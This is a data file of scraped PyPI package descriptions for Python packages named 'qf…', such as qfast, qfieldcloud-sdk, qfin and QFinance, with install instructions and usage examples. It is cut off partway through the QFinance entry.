filessystem=FileSystem.parse('echo.qface')# prepare the generatorgenerator=Generator(searchpath='.')# iterate over the domain modelformoduleinsystem.modules:forinterfaceinmodule.interfaces:# prepare a context objectctx={'interface':interface}# use header.h template with ctx to write to a filegenerator.write('{{interface|lower}}.h','header.h',ctx)Depending on the used generator it reads the input file and runs it through the generator. The output files are written relative to the given output directory. The input can be either a file or a folder."} +{"package": "qface-qtcpp", "pacakge-description": "UNKNOWN"} +{"package": "qface-qtqml", "pacakge-description": "# qface-qtqmlThe reference QtQml generator for qface"} +{"package": "qface-qtro", "pacakge-description": "# QFace QtRemoteObjects GeneratorWork In ProgressThis generator tries to generate a complete micro service solution. It does so by\nreading the QFace IDL file and generating a client side plugin and a service\nfor each interface. Each module will be bundled into one server with an own\nservice registry where all interfaces from the module will be available.As a user you can simply import the QML generated plugin and ensure the server\nside generated stub is being implemented.The QML plugin will automatically connect to the server, which needs to run\nwhen the plugin is loaded.Each interface service is accessible using the fully qualified name. Different\nthan the REPC the models are also integrated into the service interface as\ndescribed via the QFace IDL.Open Issues:\n- Ideally the client side has a mean to start the server on demand.\n- What happens if the customer would like to have only one service registry for all\nmodules (e.g. the whole system)?"} +{"package": "qface-store", "pacakge-description": "UNKNOWN"} +{"package": "qfactor", "pacakge-description": "Quantum Fast Circuit Optimizer (Qfactor)This optimizer can optimize the distance between a circuit, a sequence of\nunitary gates, and a target unitary matrix. This optimizer uses an analytic\nmethod based on the SVD operation.InstallationThe best way to install this python package is with pip.pip install qfactorUsageThe qfactor package can be used to optimize a specified circuit.\nYou can specify your circuit with a list of Gate objects and pass them to\nthe optimize function. Seean example.CopyrightQuantum Fast Circuit Optimizer (qFactor) Copyright (c) 2020, The\nRegents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals\nfrom the U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast", "pacakge-description": "QFAST: Quantum Fast Approximate Synthesis ToolQFAST is a quantum synthesis tool designed to produce short circuits and to scale well in practice. QFAST uses a mathematical model of circuits encoding both gate placement and function. This is packaged together with a hierarchical stochastic gradient descent formulation that combines \u201ccoarse-grained\u201d fast optimization during circuit structure search with a better, but slower, stage only in the final circuit refinement.InstallationThe best way to install this python package is with pip.pip install qfastUsageQFAST can be used to convert a quantum operation specified by a unitary matrix into a circuit given byopenqasmcode. There is a command-line interface provided with qfast that can be accessed bypython -m qfast. This can be used to synthesize a matrix.python -m qfast input.unitary output.qasmHere theinput.unitaryfile is a NumPy matrix saved withnp.savetxt, the qasm output will be saved in theoutput.qasmfile and the KAK native tool will be used. The command-line help optionpython -m qfast -hcan be used for further information.QFAST can also be used as a library,an exampleis included.Native ToolsNative tools are necessary for QFAST to perform instantiation. During decomposition, the input unitary matrix is hierarchically broken into many smaller unitaries. At some level in the hierarchy, QFAST switches to instantiation, which uses a native synthesis tool to convert the small unitaries into native gates.Included with this python package is the QSearch native tool. Here are some others:qfast-qiskit: Several qiskit toolsqfast-uq: A UniversalQCompiler native tool (deprecated)qfast-qs: A QSearch native tool (Now default)ReferencesYounis, Ed, et al. \"QFAST: Quantum Synthesis Using a Hierarchical Continuous Circuit Space.\" arXiv preprint arXiv:2003.04462 (2020).CopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-qiskit", "pacakge-description": "QFAST-QISKit: QISKit Plugin for QFASTQFAST-QISKit packages several QISKit tools forQFAST.\nThere are two native tools, KAKTool and QiskitTool, that are included.\nAlso, QiskitCombiner is a recombination tool that uses qiskit to\npiece together small circuits. The QiskitCombiner provides circuit optimization\nthat isn't available with the default NaiveCombiner.InstallationThe best way to install this python package is with pip.pip install qfast-qiskitCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-qs", "pacakge-description": "QFAST-QS: QSearch Plugin for QFASTQFAST-QS packages the SearchCompiler as a native tool plugin forQFAST. This package imports the QSearch Compiler which can be foundhereand its licensehere.InstallationThe best way to install this python package is with pip.pip install qfast-qsCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-sc", "pacakge-description": "QFAST-SC: SearchCompiler Plugin for QFASTQFAST-SC packages the SearchCompiler as a native tool plugin forQFAST. This package imports the SearchCompiler which can be foundhereand its licensehere.InstallationThe best way to install this python package is with pip.pip install qfast-scCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-uq", "pacakge-description": "QFAST-UQ: UniversalQ Compiler Plugin for QFASTQFAST-UQ packages the qiskit's implementation of isometry decomposition as a native tool plugin forQFAST.InstallationThe best way to install this python package is with pip.pip install qfast-uqCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfathom", "pacakge-description": "UNKNOWN"} +{"package": "qfc", "pacakge-description": "QFC - Quantized Fourier Compression of Timeseries Data with Application to ElectrophysiologyOverviewWith the increasing sizes of data for extracellular electrophysiology, it is crucial to develop efficient methods for compressing multi-channel time series data. While lossless methods are desirable for perfectly preserving the original signal, the compression ratios for these methods usually range only from 2-4x. What is needed are ratios on the order of 10-30x, leading us to consider lossy methods.Here, we introduce a simple lossy compression method, inspired by the Discrete Cosine Transform (DCT) and the quantization steps of JPEG compression for images. The method comprises the following steps:Compute the Discrete Fourier Transform (DFT) of the time series data in the time domain.Quantize the Fourier coefficients to achieve a target entropy (the entropy determines the theoretically achievable compression ratio). This is done by multiplying by a normalization factor and then rounding to the nearest integer.Compress the reduced-entropy quantized Fourier coefficients using ZLIB (other methods could also be used).To decompress:Unzip the quantized Fourier coefficients.Divide by the normalization factor.Compute the Inverse Discrete Fourier Transform (IDFT) to obtain the reconstructed time series data.This method is particularly well-suited for data that has been bandpass-filtered, as the suppressed Fourier coefficients yield an especially low entropy of the quantized signal.For a comparison of various lossy and lossless compression schemes, seeCompression strategies for large-scale electrophysiology data, Buccino et al..For application to real data,see this notebook.InstallationpipinstallqfcUsage# See the examples directoryfrommatplotlibimportpyplotaspltimportnumpyasnpfromqfcimportqfc_compress,qfc_decompress,qfc_estimate_normalization_factordefmain():sampling_frequency=30000y=np.random.randn(5000,10)*50y=lowpass_filter(y,sampling_frequency,6000)y=y.astype(np.int16)target_compression_ratio=15############################################################normalization_factor=qfc_estimate_normalization_factor(y,target_compression_ratio=target_compression_ratio)compressed_bytes=qfc_compress(y,normalization_factor=normalization_factor)y_decompressed=qfc_decompress(compressed_bytes,normalization_factor=normalization_factor,original_shape=y.shape)############################################################y_resid=y-y_decompressedoriginal_size=y.nbytescompressed_size=len(compressed_bytes)compression_ratio=original_size/compressed_sizeprint(f\"Original size:{original_size}bytes\")print(f\"Compressed size:{compressed_size}bytes\")print(f'Target compression ratio:{target_compression_ratio}')print(f\"Actual compression ratio:{compression_ratio}\")print(f'Std. dev. of residual:{np.std(y_resid):.2f}')xgrid=np.arange(y.shape[0])/sampling_frequencych=3# select a channel to plotplt.figure()plt.plot(xgrid,y[:,ch],label=\"Original\")plt.plot(xgrid,y_decompressed[:,ch],label=\"Decompressed\")plt.plot(xgrid,y_resid[:,ch],label=\"Residual\")plt.xlabel(\"Time\")plt.title(f'QFC compression ratio:{compression_ratio:.2f}')plt.legend()plt.show()deflowpass_filter(input_array,sampling_frequency,cutoff_frequency):F=np.fft.fft(input_array,axis=0)N=input_array.shape[0]freqs=np.fft.fftfreq(N,d=1/sampling_frequency)sigma=cutoff_frequency/3window=np.exp(-np.square(freqs)/(2*sigma**2))F_filtered=F*window[:,None]filtered_array=np.fft.ifft(F_filtered,axis=0)returnnp.real(filtered_array)if__name__==\"__main__\":main()LicenseThis code is provided under the Apache License, Version 2.0.AuthorJeremy Magland, Center for Computational Mathematics, Flatiron Institute"} +{"package": "qf-common", "pacakge-description": "No description available on PyPI."} +{"package": "qf-diamond-norm", "pacakge-description": "QuantumFlow Diamond NormGavin E. Crooks (2020)SourceCalculation of the diamond norm between two completely positive trace-preserving (CPTP) superoperators, using\ntheQuantumFlowpackageThe calculation uses the simplified semidefinite program of WatrousarXiv:0901.4709[J. Watrous,Theory of Computing 5, 11, pp. 217-238\n(2009)]Kudos: Based on MatLab code written byMarcus P. da SilvaInstallationNote: Diamond norm requires that the \"cvxpy\" package (and dependencies) be fully installed. Installing cvxpy via pip\ndoes not correctly install all the necessary packages.$ conda install -c conda-forge cvxpy\n$ git clone https://github.com/gecrooks/qf_diamond_norm.git\n$ cd qf_diamond_norm\n$ pip install -e .Example> import quantumflow as qf\n > from qf_diamond_norm import diamond_norm\n > chan0 = qf.random_channel([0, 1, 2]) # 3-qubit channel\n > chan1 = qf.random_channel([0, 1, 2])\n > dn = diamond_norm(chan0, chan1)\n > print(dn)"} +{"package": "qfe", "pacakge-description": "QFE"} +{"package": "qff", "pacakge-description": "QFF: Quantize Financial FrameworkQFFis a Python package of quantitative financial framework, which is used to provide a localized backtesting and simulation trading environment for individuals, so that users can focus more on trading strategy writing.Main FeaturesHere are just a few of the things that QFF does well:Provide one-stop solutions such as data crawling, data cleaning, data storage, strategy writing, strategy analysis, strategy backtest and simulated trade.Provide graceful interface for strategy writing (similar to JoinQuant), facilitate users to get started quickly.Provide a local running environment to improve the strategy running efficiency.Provide rich interfaces to obtain free stock data, such as fundamental data, real-time and historical market data etc.Provide practical auxiliary functions to simplify strategy writing, such as indicator calculation, trading system framework, etc.InstallationSource codeThe source code is currently hosted on GitHub at:https://github.com/haijiangxu/qffGeneralpipinstallqff--upgradeChinapipinstallqff-ihttp://mirrors.aliyun.com/pypi/simple/--upgradeDockerDocker image for the QFF is athttps://hub.docker.com/r/haijiangxu/qff.pull docker imagedockerpullqffrun docker imagedockerrun-d-v/root/xxxx:/root/work-p8765:8765qffDocumentDocumentation for the latest Current release is athttps://qff.readthedocs.io/zh_CN/latest/.ContributionQFF is still under developing, feel free to open issues and pull requests:Report or fix bugsRequire or publish interfaceWrite or fix documentationAdd test casesStatementQFF only supports stocks, but not other financial products such as futures, funds, foreign exchange, bonds, cryptocurrencies, etc.All data provided by QFF is just for academic research purpose.The data provided by QFF is for reference only and does not constitute any investment proposal.Any investor based on QFF research should pay more attention to data risk.QFF will insist on providing open-source financial data.Based on some uncontrollable factors, some data interfaces in QFF may be removed.Please follow the relevant open-source protocol used by QFF.AcknowledgementSpecial thanksQUANTAXISfor the opportunity of learning from the project;Special thanksAKSharefor the opportunity of learning from the project;Special thanksJoinQuantfor the opportunity of learning from the project;"} +{"package": "qfieldcloud-sdk", "pacakge-description": "The official QFieldCloud SDK and CLIqfieldcloud-sdkis the official client to connect to QFieldCloud API either as a python module, or directly from the command line.ContentsInstallationCLI usageModule usageInstallLinux/macOSpip3 install qfieldcloud-sdkWindowsInstall Python with your favorite package manager. Then:python -m pip install qfieldcloud-sdkCLI usageThe package also ships with the official QFieldCloud CLI tool.Usageqfieldcloud-cli [OPTIONS] COMMAND [ARGS]...Examples# logs in user \"user\" with password \"pass\"qfieldcloud-cliloginuserpass# gets the projects of user \"user\" with password \"pass\" at \"https://localhost/api/v1/\"qfieldcloud-cli-uuser-ppass-Uhttps://localhost/api/v1/list-projects# gets the projects of user authenticated with token `QFIELDCLOUD_TOKEN` at \"https://localhost/api/v1/\" as JSONexportQFIELDCLOUD_URL=https://localhost/api/v1/exportQFIELDCLOUD_TOKEN=017478ee2464440cb8d3e98080df5e5a\nqfieldcloud-cli--jsonlist-projectsMore detailed documentation can be foundhereModule usagefromimportsdkclient=sdk.Client(url=\"https://app.qfield.cloud/api/v1/\")client.login(username=\"user1\",password=\"pass1\",)projects=client.list_projects()>projectsProjects:0myusername/myproject11myusername/myproject2...DevelopmentContributions are more than welcome!Code styleCode style done withprecommit.pip install pre-commit\n# if you want to have git commits trigger pre-commit, install pre-commit hook:\npre-commit install\n# else run manually before (re)staging your files:\npre-commit run --all-filesCloning the projectOne time action to clone and setup:gitclonehttps://github.com/opengisch/qfieldcloud-sdk-pythoncdqfieldcloud-sdk-python# install dev dependenciespython3-mpipinstallpipenv\npre-commitinstall# install package in a virtual environmentpipenvinstall-rrequirements.txtTo run CLI interface for development purposes execute:pipenvshell# if your pipenv virtual environment is not active yetpython-mqfieldcloud_sdkTo ease development, you can set a.envfile. Therefore you can use directly theqfieldcloud-cliexecutable:cp .env.example .env\npipenv run qfieldcloud-cliBuilding the package# make sure your shell is sourced to no virtual environmentdeactivate# buildpython3-mbuild# now either activate your shell withpipenvshell# and install withpython-mpipinstall.--force-reinstall# or manually ensure it's pipenv and not your global pip doing the installationpipenvrunpipinstall.--force-reinstallVoil\u00e0!"} +{"package": "qfile", "pacakge-description": "A python library for simplifying common file operations. Check out thegithub pagefor more info."} +{"package": "qfilter", "pacakge-description": "No description available on PyPI."} +{"package": "qfilters", "pacakge-description": "__What it is:__A lightweight package for django which does the filtering of django querysets. The central object - a filter - is a callable that takes a queryset as a parameter and returns a queryset:filtered_queryset = filtr(Model.objects.all())Django itself has a similar object - Q-object (`django.db.models.Q`). Q-objects can be combined toghether (with `|`, `&` operations) or inverted (`~`) and then passed to `queryset.filter`.With `qfilters`, what you get in the most common case, is just a wrapper around the Q-object. However there are __2 features__ that may be the reasons to use the package:__1. Support for additional filter types.__For example, there is `ValuesDictFilter`, that is constructed from a field list, that will be passed to `queryset.values` and retrieve a list of dictionaries, and a filtering function, which accepts that dict as a parameter.This filters can be combined or inverted in the same way Q-objects do, so that using multiple filters would result in a single call to `queryset.values`.This is what it looks like in practice (all examples are taken from the `qfilter` testsuite):@ValuesDictFilter('@', fields_list=['traits__good_hunter'])def nas_i_zdes_neploho_kormyat(obj):return obj['traits__good_hunter'] is False # because it can be Nonecats = nas_i_zdes_neploho_kormyat(self.CatsBreed.objects.all())assert cats.exists()There are also exotic variants (`qfilters.exotic_types`) like `QuerysetIterationHook`, which appends attributes to objects when queryset is iterated over. Another one is `PropertyBasedFilter`, which can access object's attributes and even properties like it were a regular django model object. The implementation is not very straightforward, still it passes the tests so far. Here is what it looks like:class CatsBreed(models.Model):# ...traits = models.OneToOneField('Traits')class Traits(models.Model):#...weight_min = models.FloatField(u'\u0412\u0435\u0441 \u043e\u0442, \u043a\u0433', null=True)weight_max = models.FloatField(u'\u0412\u0435\u0441 \u0434\u043e, \u043a\u0433', null=True)# if you can't specify min and maxweight = models.FloatField(u'\u0412\u0435\u0441, \u043a\u0433', null=True)@propertydef kg(self):return self.weight or self.weight_maxfrom qfilters import PropertyBasedFilter@PropertyBasedFilter('@',fields_list=['traits__weight', 'traits__weight_max'],properties=['traits.kg'])def light_cats(obj):return not obj.traits.kg or obj.traits.kg < 3assert light_cats(CatsBreed.objects.all()).exists()__2. Using class as container: methods are filters__It is convenient to have an object, which can hold some context (for example, the view itself),and let the methods be filters, and be able to access this context. `qfilters.containers` provide this functionality, specifically, there is a `MethodFilter` class:from qfilter import MethodFilterclass ManyFilters(MethodFilter):def filter__q(self):return Q(name__in=[u'\u0421\u0438\u0430\u043c\u0441\u043a\u0430\u044f', u'\u041d\u043e\u0440\u0432\u0435\u0436\u0441\u043a\u0430\u044f \u043b\u0435\u0441\u043d\u0430\u044f'])@make_filter(PropertyBasedFilter,fields_list=['traits__weight', 'traits__weight_max'],properties=['traits.kg'])def filter__big(self, cat):return cat.traits.kg and cat.traits.kg > 5def filter__q_yet_another(self):return Q(name__in=[u'\u041f\u0435\u0440\u0441\u0438\u0434\u0441\u043a\u0430\u044f', u'\u041d\u043e\u0440\u0432\u0435\u0436\u0441\u043a\u0430\u044f \u043b\u0435\u0441\u043d\u0430\u044f'])filters = ManyFilters()cat = filters(CatsBreed.objects.all())[0]The idea was born from the experience of using the [django-rest-framework](http://www.django-rest-framework.org/). There is a notion of filter backend (a class) which every view knows about. First I implemented a simple method-based filter backend, the possible return values for the methods were eiher a Q-object or a queryset. But then I got difficulties with debugging since the return value doesn't even know which method it came from. Thus, I decided it will be a good idea to have this filter obbject.P.S. `qfilters` does not provide a filter backend to use with django-rest-framework, but it's a piece of cake to write one."} +{"package": "qfin", "pacakge-description": "Q-FinA Python library for mathematical finance.Installationhttps://pypi.org/project/QFin/pip install qfinVersion '>= 0.1.20'QFin is being reconstructed to leverage more principals of object-oriented programming. Several modules in this version are deprecated along with the solutions to PDEs/SDEs (mainly in the options module).QFin now contains a module called 'stochastics' which will be largely responsible for model calibration and option pricing. A Cython/C++ equivalent to QFin is also being constructed so stay tuned!Option Pricing(version >= 0.1.20)Stochastic differential equations that model underlying asset dynamics extend the 'StochasticModel' class and posses a list of model parameters and functions for pricing vanillas, calibrating to implied volatility surfaces, and Monte Carlo simulations (particularly useful after calibration for pricing path dependent options).Below is a trivial example using ArithmeticBrownianMotion - first import the StochasticModel...fromqfin.stochasticsimportArithmeticBrownianMotionNext initialize the class object by parameterizing the model...# abm parameterized by Bachelier vol = .3abm=ArithmeticBrownianMotion([.3])The abm may now be used to price a vanilla call/put option (prices default to \"CALL\") under the given parameter set...# F0 = 101# X = 100# T = 1abm.vanilla_pricing(101,100,1,\"CALL\")# Call Price: 1.0000336233656906Using call-put parity put prices may also be obtained...# F0 = 99# X = 100# T = 1abm.vanilla_pricing(99,100,1,\"PUT\")# Put Price: 1.0000336233656952Calibration and subsequent simulation of the process is also available - do note that some processes have a static volatility and can't be calibrated to an ivol surface.The arithmetic Brownian motion may be simulated as follows...# F0 = 100# n (steps) = 10000# dt = 1/252# T = 1abm.simulate(100,10000,1/252,1)Results of the simulation along with the simulation characteristics are stored under the tuple 'path_characteristics' : (paths, n, dt, T).Using the stored path characteristics we may find the price of a call just as before by averaging each discounted path payoff (assuming a stock process) with zero-rates we can avoid discounting as follows and find the option value as follows...# list of path payoffspayoffs=[]# option strike priceX=99# iteration through terminal path values to identify payoffforpathinabm.path_characteristics[0]:# appending CALL payoffpayoffs.append(max((path[-1]-X),0))# option value todaynp.average(payoffs)# Call Price: 1.0008974837343871We can see here that the simulated price is converging to the price in close-form.Option Pricing (version < 0.1.20)Black-Scholes PricingTheoretical options pricing for non-dividend paying stocks is available via the BlackScholesCall and BlackScholesPut classes.fromqfin.optionsimportBlackScholesCallfromqfin.optionsimportBlackScholesPut# 100 - initial underlying asset price# .3 - asset underlying volatility# 100 - option strike price# 1 - time to maturity (annum)# .01 - risk free rate of interesteuro_call=BlackScholesCall(100,.3,100,1,.01)euro_put=BlackScholesPut(100,.3,100,1,.01)print('Call price: ',euro_call.price)print('Put price: ',euro_put.price)Call price: 12.361726191532611\nPut price: 11.366709566449416Option GreeksFirst-order and some second-order partial derivatives of the Black-Scholes pricing model are available.DeltaFirst-order partial derivative with respect to the underlying asset price.print('Call delta: ',euro_call.delta)print('Put delta: ',euro_put.delta)Call delta: 0.5596176923702425\nPut delta: -0.4403823076297575GammaSecond-order partial derivative with respect to the underlying asset price.print('Call gamma: ',euro_call.gamma)print('Put gamma: ',euro_put.gamma)Call gamma: 0.018653923079008084\nPut gamma: 0.018653923079008084VegaFirst-order partial derivative with respect to the underlying asset volatility.print('Call vega: ',euro_call.vega)print('Put vega: ',euro_put.vega)Call vega: 39.447933090788894\nPut vega: 39.447933090788894ThetaFirst-order partial derivative with respect to the time to maturity.print('Call theta: ',euro_call.theta)print('Put theta: ',euro_put.theta)Call theta: -6.35319039407325\nPut theta: -5.363140560324083Stochastic ProcessesSimulating asset paths is available using common stochastic processes.Geometric Brownian MotionStandard model for implementing geometric Brownian motion.fromqfin.simulationsimportGeometricBrownianMotion# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)gbm=GeometricBrownianMotion(100,0,.3,1/52,1)print(gbm.simulated_path)[107.0025048205179, 104.82320056538235, 102.53591127422398, 100.20213816642244, 102.04283245358256, 97.75115579923988, 95.19613943526382, 96.9876745495834, 97.46055174410736, 103.93032659279226, 107.36331603194304, 108.95104494118915, 112.42823319947456, 109.06981862825943, 109.10124426285238, 114.71465058375804, 120.00234814086286, 116.91730159923688, 118.67452601825876, 117.89233466917202, 118.93541257993591, 124.36106523035058, 121.26088015675688, 120.53641952983601, 113.73881043255554, 114.91724168548876, 112.94192281337791, 113.55773877160591, 107.49491796151044, 108.0715118831013, 113.01893111071472, 110.39204535739405, 108.63917240906524, 105.8520395233433, 116.2907247951675, 114.07340779267213, 111.06821275009212, 109.65530380775077, 105.78971667172465, 97.75385009989282, 97.84501925249452, 101.90695475825825, 106.0493833583297, 105.48266575656817, 106.62375752876223, 112.39829297429974, 111.22855058562658, 109.89796974828265, 112.78068777325248, 117.80550869036715, 118.4680557054793, 114.33258212280838]Stochastic Variance ProcessStochastic volatility model based on Heston's paper (1993).fromqfin.simulationsimportStochasticVarianceModel# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .01 - risk free rate of interest# .05 - continuous dividend# 2 - rate in which variance reverts to the implied long run variance# .25 - implied long run variance as time tends to infinity# -.7 - correlation of motion generated# .3 - Variance's volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)svm=StochasticVarianceModel(100,0,.01,.05,2,.25,-.7,.3,.09,1/52,1)print(svm.simulated_path)[98.21311553503577, 100.4491317019877, 89.78475515902066, 89.0169762497475, 90.70468848525869, 86.00821802256675, 80.74984494892573, 89.05033807013137, 88.51410029337134, 78.69736798230346, 81.90948751054125, 83.02502248913251, 83.46375102829755, 85.39018282900138, 78.97401642238059, 78.93505221741903, 81.33268688455111, 85.12156706038515, 79.6351983987908, 84.2375291273571, 82.80206517176038, 89.63659376223292, 89.22438477640516, 89.13899271995662, 94.60123239511816, 91.200165507022, 96.0578905115345, 87.45399399599378, 97.908745925816, 97.93068975065052, 103.32091104292813, 110.58066464778392, 105.21520242908348, 99.4655106985056, 106.74882010453683, 112.0058519886151, 110.20930861932342, 105.11835510815085, 113.59852610881678, 107.13315204738092, 108.36549026977205, 113.49809943785571, 122.67910031073885, 137.70966794451425, 146.13877267735612, 132.9973784430374, 129.75750117504984, 128.7467891695649, 127.13115959080305, 130.47967713110302, 129.84273088908265, 129.6411527208744]Simulation PricingExotic OptionsSimulation pricing for exotic options is available under the assumptions associated with the respective stochastic processes. Geometric Brownian motion is the base underlying stochastic process used in each Monte Carlo simulation. However, should additional parameters be provided, the appropriate stochastic process will be used to generate each sample path.Vanilla Optionsfromqfin.simulationsimportMonteCarloCallfromqfin.simulationsimportMonteCarloPut# 100 - strike price# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)call_option=MonteCarloCall(100,1000,.01,100,0,.3,1/52,1)# These additional parameters will generate a Monte Carlo price based on a stochastic volatility process# 2 - rate in which variance reverts to the implied long run variance# .25 - implied long run variance as time tends to infinity# -.5 - correlation of motion generated# .02 - continuous dividend# .3 - Variance's volatilityput_option=MonteCarloPut(100,1000,.01,100,0,.3,1/52,1,2,.25,-.5,.02,.3)print(call_option.price)print(put_option.price)12.73812121792851\n23.195814963576286Binary Optionsfromqfin.simulationsimportMonteCarloBinaryCallfromqfin.simulationsimportMonteCarloBinaryPut# 100 - strike price# 50 - binary option payout# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)binary_call=MonteCarloBinaryCall(100,50,1000,.01,100,0,.3,1/52,1)binary_put=MonteCarloBinaryPut(100,50,1000,.01,100,0,.3,1/52,1)print(binary_call.price)print(binary_put.price)22.42462873441866\n27.869902820039087Barrier Optionsfromqfin.simulationsimportMonteCarloBarrierCallfromqfin.simulationsimportMonteCarloBarrierPut# 100 - strike price# 50 - binary option payout# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)# True/False - Barrier is Up or Down# True/False - Barrier is In or Outbarrier_call=MonteCarloBarrierCall(100,1000,150,.01,100,0,.3,1/52,1,up=True,out=True)barrier_put=MonteCarloBarrierCall(100,1000,95,.01,100,0,.3,1/52,1,up=False,out=False)print(binary_call.price)print(binary_put.price)4.895841997908933\n5.565856754630819Asian Optionsfromqfin.simulationsimportMonteCarloAsianCallfromqfin.simulationsimportMonteCarloAsianPut# 100 - strike price# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)asian_call=MonteCarloAsianCall(100,1000,.01,100,0,.3,1/52,1)asian_put=MonteCarloAsianPut(100,1000,.01,100,0,.3,1/52,1)print(asian_call.price)print(asian_put.price)6.688201154529573\n7.123274528125894Extendible Optionsfromqfin.simulationsimportMonteCarloExtendibleCallfromqfin.simulationsimportMontecarloExtendiblePut# 100 - strike price# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)# .5 - extension if out of the money at expirationextendible_call=MonteCarloExtendibleCall(100,1000,.01,100,0,.3,1/52,1,.5)extendible_put=MonteCarloExtendiblePut(100,1000,.01,100,0,.3,1/52,1,.5)print(extendible_call.price)print(extendible_put.price)13.60274931789973\n13.20330578685724"} +{"package": "qfinance", "pacakge-description": "QFinanceCopyright (c) 2023 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QFinanceQFinanceis a Quantum Finance library based on theQComputeSDK. It provides a set of tools for building quantum algorithms for finance. Currently, it supports the following features:Pricing European options using Quantum Monte Carlo methodPricing European options using classical methods, includingBlack-Scholes-Merton methodClassical Monte Carlo methodThe following quantum algorithms are implemented inQFinance:Quantum Monte Carlo algorithm for simple piecewise linear payoff functionArbitrary quantum state preparationQuantum Fourier transformQuantum phase estimationQuantum amplitude estimation algorithms:Canonical Quantum Amplitude Estimation [Brassard 2002]Maximum Likelihood Amplitude Estimation [Suzuki 2019]Iterative Quantum Amplitude Estimation [Grinko 2019]InstallationQFinance is available on PyPI. To install the latest release, run:pipinstallqfinancepipwill handle all dependencies automatically.ExamplesOption PricingimportQComputeQCompute.Define.Settings.outputInfo=FalsefromQFinance.pricingimportEuropeanOptionPricingClassical,EuropeanCallQMC# set parameters# s0 is the current price of the underlying asset# k is the strike price# t is the time to maturity (in years)# r is the risk-free interest rate# sigma is the volatility of the underlying 